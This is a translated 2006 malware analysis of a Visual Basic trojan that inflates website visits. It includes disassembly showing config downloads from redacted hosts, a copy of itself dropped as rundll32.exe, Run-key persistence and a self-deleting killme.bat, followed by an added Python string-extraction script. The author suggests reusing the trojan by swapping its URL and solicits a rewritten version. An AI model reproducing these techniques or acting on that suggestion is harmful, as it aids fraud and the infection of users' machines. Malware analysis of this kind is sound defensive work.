Analysis of a small Trojan that inflates website visit counts - vulnerability warning - Heiba Security Net (the "black bar safety net")

2006-08-19T00:00:00
ID MYHACK58:62200611173
Type myhack58
Reporter 佚名 (anonymous)
Modified 2006-08-19T00:00:00

Description

Article author: 混世魔王. Information source: Evil Octal Information Security Team (www.eviloctal.com)

System fully patched, wandering around online, and I still got hit by a web Trojan. Sigh. Now... I downloaded his web Trojan. Not bad, the real thing: it works on 98, NT, 2000, XP, XP SP2 and 2003 alike. I kept it just to analyze his Trojan. A traffic-boosting Trojan. Impressive. Ponies have come to this now. Unpacking omitted; it is written in VB.

00403DAD . FF15 54104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj
00403DB3 . 8985 E0FCFFFF  MOV DWORD PTR SS:[EBP-320],EAX
00403DB9 . EB 0A          JMP SHORT Rundll32.00403DC5
00403DBB > C785 E0FCFFFF> MOV DWORD PTR SS:[EBP-320],0
00403DC5 > 8B95 60FEFFFF  MOV EDX,DWORD PTR SS:[EBP-1A0]
00403DCB . 8995 F8FCFFFF  MOV DWORD PTR SS:[EBP-308],EDX
00403DD1 . C785 60FEFFFF> MOV DWORD PTR SS:[EBP-1A0],0
00403DDB . 8B85 F8FCFFFF  MOV EAX,DWORD PTR SS:[EBP-308]
00403DE1 . 8985 34FEFFFF  MOV DWORD PTR SS:[EBP-1CC],EAX
00403DE7 . C785 2CFEFFFF> MOV DWORD PTR SS:[EBP-1D4],8
00403DF1 . 8D95 2CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1D4]
00403DF7 . 8D8D F8FEFFFF  LEA ECX,DWORD PTR SS:[EBP-108]
00403DFD . FF15 08104000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarMo>; msvbvm60.__vbaVarMove
00403E03 . C745 FC 06000> MOV DWORD PTR SS:[EBP-4],6
00403E0A . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E14 . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E1E . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E24 . 8D4D A0        LEA ECX,DWORD PTR SS:[EBP-60]
00403E27 . FF15 70114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E2D . C745 FC 07000> MOV DWORD PTR SS:[EBP-4],7
00403E34 . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adlist.txt"
00403E3E . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E48 . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E4E . 8D8D 6CFFFFFF  LEA ECX,DWORD PTR SS:[EBP-94]
00403E54 . FF15 70114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E5A . C745 FC 08000> MOV DWORD PTR SS:[EBP-4],8
00403E61 . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403E6B . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E75 . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403E7B . 8D4D 8C        LEA ECX,DWORD PTR SS:[EBP-74]
00403E7E . FF15 70114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403E84 . C745 FC 09000> MOV DWORD PTR SS:[EBP-4],9
00403E8B . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adiepage.txt"
00403E95 . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403E9F . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403EA5 . 8D8D B8FEFFFF  LEA ECX,DWORD PTR SS:[EBP-148]
00403EAB . FF15 70114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EB1 . C745 FC 0A000> MOV DWORD PTR SS:[EBP-4],0A
00403EB8 . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/ieFavorites.txt"
00403EC2 . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403ECC . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403ED2 . 8D8D 7CFFFFFF  LEA ECX,DWORD PTR SS:[EBP-84]
00403ED8 . FF15 70114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarCo>; msvbvm60.__vbaVarCopy
00403EDE . C745 FC 0B000> MOV DWORD PTR SS:[EBP-4],0B
00403EE5 . C785 D4FDFFFF> MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"
00403EEF . C785 CCFDFFFF> MOV DWORD PTR SS:[EBP-234],8
00403EF9 . 8D95 CCFDFFFF  LEA EDX,DWORD PTR SS:[EBP-234]
00403EFF . 8D8D 2CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F05 . FF15 6C114000  CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDu>; msvbvm60.__vbaVarDup
00403F0B . 8D8D 2CFEFFFF  LEA ECX,DWORD PTR SS:[EBP-1D4]
00403F11 . 51             PUSH ECX
00403F12 . 8D95 1CFEFFFF  LEA EDX,DWORD PTR SS:[EBP-1E4]
00403F18 . 52             PUSH EDX
00403F19 . FF15 60104000  CALL DWORD PTR DS:[<&msvbvm60.rtcEnviron>; msvbvm60.rtcEnvironVar
00403F1F . C785 C4FDFFFF> MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\rundll32.exe"
00403F29 . C785 BCFDFFFF> MOV DWORD PTR SS:[EBP-244],8

The program reads its configuration files from the tc folder at http://www.xxxxxxxx.com/tc/ and at the same time accesses tc/MMResult.asp.

Generating the file:

00404DA2 . /EB 0A          JMP SHORT Rundll32.00404DAE                    //get the file path onto the stack
00404DA4 > |C785 88FCFFFF> MOV DWORD PTR SS:[EBP-378],0
00404DAE > \8B85 60FEFFFF  MOV EAX,DWORD PTR SS:[EBP-1A0]                 //my program path is "D:\fuck you"
00404DB4 . 50              PUSH EAX                                       //push the path held in EAX
00404DB5 . 68 80274000     PUSH Rundll32.00402780                         ; //generates killme.bat
00404DBA . FF15 48104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404DC0 . 8BD0            MOV EDX,EAX                                    //file path + file name: D:\fuck you\killme.bat
00404DC2 . 8D8D 5CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DC8 . FF15 80114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404DCE . 50              PUSH EAX
00404DCF . 6A 01           PUSH 1
00404DD1 . 6A FF           PUSH -1
00404DD3 . 6A 02           PUSH 2
00404DD5 . FF15 28114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFileOp>; msvbvm60.__vbaFileOpen
00404DDB . 8D8D 5CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A4]
00404DE1 . 51              PUSH ECX
00404DE2 . 8D95 60FEFFFF   LEA EDX,DWORD PTR SS:[EBP-1A0]
00404DE8 . 52              PUSH EDX
00404DE9 . 6A 02           PUSH 2
00404DEB . FF15 48114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404DF1 . 83C4 0C         ADD ESP,0C
00404DF4 . 8D8D 40FEFFFF   LEA ECX,DWORD PTR SS:[EBP-1C0]
00404DFA . FF15 A8114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404E00 . C745 FC 23000>  MOV DWORD PTR SS:[EBP-4],23
00404E07 . 68 9C274000     PUSH Rundll32.0040279C                         ; @echo off
00404E0C . 6A 01           PUSH 1
00404E0E . 68 B4274000     PUSH Rundll32.004027B4
00404E13 . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E19 . 83C4 0C         ADD ESP,0C
00404E1C . C745 FC 24000>  MOV DWORD PTR SS:[EBP-4],24
00404E23 . 68 BC274000     PUSH Rundll32.004027BC                         ; sleep 100
00404E28 . 6A 01           PUSH 1
00404E2A . 68 B4274000     PUSH Rundll32.004027B4
00404E2F . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404E35 . 83C4 0C         ADD ESP,0C
00404E38 . C745 FC 25000>  MOV DWORD PTR SS:[EBP-4],25
00404E3F . 833D A8934000>  CMP DWORD PTR DS:[4093A8],0
00404E46 . 75 1C           JNZ SHORT Rundll32.00404E64
00404E48 . 68 A8934000     PUSH Rundll32.004093A8
00404E4D . 68 94254000     PUSH Rundll32.00402594
00404E52 . FF15 30114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaNew2>]      ; msvbvm60.__vbaNew2
00404E58 . C785 84FCFFFF>  MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E62 . EB 0A           JMP SHORT Rundll32.00404E6E
00404E64 > C785 84FCFFFF>  MOV DWORD PTR SS:[EBP-37C],Rundll32.00409>
00404E6E > 8B85 84FCFFFF   MOV EAX,DWORD PTR SS:[EBP-37C]
00404E74 . 8B08            MOV ECX,DWORD PTR DS:[EAX]
........
00404F1D . 52              PUSH EDX
00404F1E . FF15 54104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaHresul>; msvbvm60.__vbaHresultCheckObj
00404F24 . 8985 7CFCFFFF   MOV DWORD PTR SS:[EBP-384],EAX
00404F2A . EB 0A           JMP SHORT Rundll32.00404F36
00404F2C > C785 7CFCFFFF>  MOV DWORD PTR SS:[EBP-384],0
00404F36 > 68 D4274000     PUSH Rundll32.004027D4                         ; del
00404F3B . 8B85 60FEFFFF   MOV EAX,DWORD PTR SS:[EBP-1A0]                 //program file name
00404F41 . 50              PUSH EAX                                       //push the file name (rundll322)
00404F42 . 68 E4274000     PUSH Rundll32.004027E4                         ; .exe (rundll322.exe)
00404F47 . FF15 48104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F4D . 8BD0            MOV EDX,EAX
00404F4F . 8D8D 5CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A4]
00404F55 . FF15 80114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F5B . 50              PUSH EAX
00404F5C . FF15 48104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCat>; msvbvm60.__vbaStrCat
00404F62 . 8BD0            MOV EDX,EAX                                    //del rundll322.exe
00404F64 . 8D8D 58FEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F6A . FF15 80114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrMov>; msvbvm60.__vbaStrMove
00404F70 . 50              PUSH EAX
00404F71 . 6A 01           PUSH 1
00404F73 . 68 B4274000     PUSH Rundll32.004027B4
00404F78 . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404F7E . 83C4 0C         ADD ESP,0C
00404F81 . 8D8D 58FEFFFF   LEA ECX,DWORD PTR SS:[EBP-1A8]
00404F87 . 51              PUSH ECX
00404F88 . 8D95 5CFEFFFF   LEA EDX,DWORD PTR SS:[EBP-1A4]
00404F8E . 52              PUSH EDX
00404F8F . 8D85 60FEFFFF   LEA EAX,DWORD PTR SS:[EBP-1A0]
00404F95 . 50              PUSH EAX
00404F96 . 6A 03           PUSH 3
00404F98 . FF15 48114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeSt>; msvbvm60.__vbaFreeStrList
00404F9E . 83C4 10         ADD ESP,10
00404FA1 . 8D8D 40FEFFFF   LEA ECX,DWORD PTR SS:[EBP-1C0]
00404FA7 . FF15 A8114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFreeOb>; msvbvm60.__vbaFreeObj
00404FAD . C745 FC 26000>  MOV DWORD PTR SS:[EBP-4],26
00404FB4 . 68 F4274000     PUSH Rundll32.004027F4                         ; del killme.bat
00404FB9 . 6A 01           PUSH 1
00404FBB . 68 B4274000     PUSH Rundll32.004027B4
00404FC0 . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FC6 . 83C4 0C         ADD ESP,0C
00404FC9 . C745 FC 27000>  MOV DWORD PTR SS:[EBP-4],27
00404FD0 . 68 18284000     PUSH Rundll32.00402818                         ; cls
00404FD5 . 6A 01           PUSH 1
00404FD7 . 68 B4274000     PUSH Rundll32.004027B4
00404FDC . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FE2 . 83C4 0C         ADD ESP,0C
00404FE5 . C745 FC 28000>  MOV DWORD PTR SS:[EBP-4],28
00404FEC . 68 24284000     PUSH Rundll32.00402824                         ; exit
00404FF1 . 6A 01           PUSH 1
00404FF3 . 68 B4274000     PUSH Rundll32.004027B4
00404FF8 . FF15 F8104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaPrintF>; msvbvm60.__vbaPrintFile
00404FFE . 83C4 0C         ADD ESP,0C
00405001 . C745 FC 29000>  MOV DWORD PTR SS:[EBP-4],29
00405008 . 6A 01           PUSH 1
0040500A . FF15 A4104000   CALL DWORD PTR DS:[<&msvbvm60.__vbaFileCl>; msvbvm60.__vbaFileClose
00405010 . C745 FC 2A000>  MOV DWORD PTR SS:[EBP-4],2A
00405017 . 833D A8934000>  CMP DWORD PTR DS:[4093A8],0
0040501E . 75 1C           JNZ SHORT Rundll32.0040503C
00405020 . 68 A8934000     PUSH Rundll32.004093A8
00405025 . 68 94254000     PUSH Rundll32.00402594

The generated batch file that deletes the traces, killme.bat, contains:

echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit

It simply writes itself into the registry Run key:

004046ED . BA 5C284000     MOV EDX,Rundll32.0040285C                      ; software\microsoft\windows\currentversion\run
004046F2 . 8D8D 08FFFFFF   LEA ECX,DWORD PTR SS:[EBP-F8]
004046F8 . FF15 40114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaStrCop>; msvbvm60.__vbaStrCopy
004046FE . C745 FC 17000>  MOV DWORD PTR SS:[EBP-4],17
00404705 . C785 D4FDFFFF>  MOV DWORD PTR SS:[EBP-22C],Rundll32.00402>     ; windir
0040470F . C785 CCFDFFFF>  MOV DWORD PTR SS:[EBP-234],8
00404719 . 8D95 CCFDFFFF   LEA EDX,DWORD PTR SS:[EBP-234]
0040471F . 8D8D 2CFEFFFF   LEA ECX,DWORD PTR SS:[EBP-1D4]
00404725 . FF15 6C114000   CALL DWORD PTR DS:[<&msvbvm60.__vbaVarDup>; msvbvm60.__vbaVarDup
0040472B . 8D95 2CFEFFFF   LEA EDX,DWORD PTR SS:[EBP-1D4]
00404731 . 52              PUSH EDX
00404732 . 8D85 1CFEFFFF   LEA EAX,DWORD PTR SS:[EBP-1E4]
00404738 . 50              PUSH EAX
00404739 . FF15 60104000   CALL DWORD PTR DS:[<&msvbvm60.rtcEnvironV>; msvbvm60.rtcEnvironVar
0040473F . C785 C4FDFFFF>  MOV DWORD PTR SS:[EBP-23C],Rundll32.00402>     ; \rundll32.exe
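As an added example (not the author's tooling), the following Python pulls the string constants out of a listing in the OllyDbg format used above and sorts them into the behaviours this analysis identifies: the config URLs, the Run key, the killme.bat lines and the drop path. The sample listing inside it is constructed from lines on this page, not dumped from the binary.

```python
"""Pull behaviour-revealing string constants out of an OllyDbg-style listing; OllyDbg
writes a referenced constant after ';' as UNICODE "..."/ASCII "..." or as bare text."""
import re
from collections import defaultdict

# Constructed sample in the page's listing format (not a dump of the binary).
SAMPLE_LISTING = """\
00403DAD . FF15 54104000 CALL DWORD PTR DS:[<&msvbvm60.__vbaHresu>; msvbvm60.__vbaHresultCheckObj
00403E0A . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/adset.txt"
00403E61 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "http://www.xxxxxxxx.com/tc/MMResult.asp"
00403EE5 . C785 D4FDFFFF>MOV DWORD PTR SS:[EBP-22C],Rundll32.0040>; UNICODE "WinDir"
00403F1F . C785 C4FDFFFF>MOV DWORD PTR SS:[EBP-23C],Rundll32.0040>; UNICODE "\\rundll32.exe"
00404E07 . 68 9C274000   PUSH Rundll32.0040279C                   ; @echo off
00404F36 > 68 D4274000   PUSH Rundll32.004027D4                   ; del
00404FB4 . 68 F4274000   PUSH Rundll32.004027F4                   ; del killme.bat
004046ED . BA 5C284000   MOV EDX,Rundll32.0040285C                ; software\\microsoft\\windows\\currentversion\\run
"""

# Comment field: a quoted UNICODE/ASCII literal, or bare text to end of line.
COMMENT_RE = re.compile(r';\s*(?:(?:UNICODE|ASCII)\s+"(?P<quoted>[^"]*)"|(?P<bare>\S.*?))\s*$')
IMPORT_MODULES = {"msvbvm60", "kernel32", "user32", "advapi32"}

def extract_strings(listing: str) -> list:
    """Referenced constants in listing order, minus bare module.symbol API names."""
    found = []
    for line in listing.splitlines():
        m = COMMENT_RE.search(line)
        if not m:
            continue
        text = m.group("quoted") if m.group("quoted") is not None else m.group("bare")
        if text.split(".")[0].lower() in IMPORT_MODULES:
            continue
        found.append(text)
    return found

def classify(strings: list) -> dict:
    """Bucket constants by the behaviour they reveal (URLs, Run key, batch, paths)."""
    buckets = defaultdict(list)
    for s in strings:
        low = s.lower()
        if low.startswith(("http://", "https://")):
            buckets["network"].append(s)        # config download / beacon
        elif r"currentversion\run" in low:
            buckets["persistence"].append(s)    # autorun registry key
        elif low == "del" or low.startswith("del ") or low.endswith(".bat"):
            buckets["self_delete"].append(s)    # killme.bat commands
        elif low.endswith(".exe") or low in ("windir", "systemroot", "temp"):
            buckets["file_path"].append(s)      # where it drops itself
        else:
            buckets["other"].append(s)
    return dict(buckets)
```

Run `classify(extract_strings(SAMPLE_LISTING))` to get the same picture the analysis reaches by hand: two network fetches, one Run-key write, the self-deleting batch lines and the %WinDir%\rundll32.exe drop path.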

Let me summarize the analysis directly. Copyright by 混世魔王, QQ: 26836659. The program only inflates visit counts; there is no backdoor. The URL is also hidden here, replaced with XXXX.

When the program runs, your computer accesses http://www.xxxxxxxx.com/tc/MMResult.asp. Look at its code:

<HTML><HEAD><TITLE></TITLE>
<meta http-equiv="refresh" content="1; url=http://www.xxxx.net">    (address replaced with xxx)
</HEAD><BODY>
<script src='http://s47.cnzz.com/stat.php?id=223697&web_id=223697' language='JavaScript' charset='gb2312'></script>    (the webmaster's site traffic counter)
</BODY></HTML>

It copies itself to c:/windows/. It generates a batch file in the directory it was run from that deletes the program, killme.bat:

echo off
sleep 100
del rundll322.exe
del killme.bat
cls
exit

When run, the program writes itself to the registry under software\microsoft\windows\currentversion\run with the value name rundll32.exe. The program is badly written; if it were injected into a process it would be somewhat more effective. Just change the URL in the program and this Trojan can be reused for one's own purposes.

Where there are shortcomings, please point them out. The programming is very simple, but I have been away from it so long that I cannot write it without relearning, and I have no time to relearn. If anyone who is good at programming writes one, remember to send me a copy. Heh. MSN: hsmw26836659@hotmail.com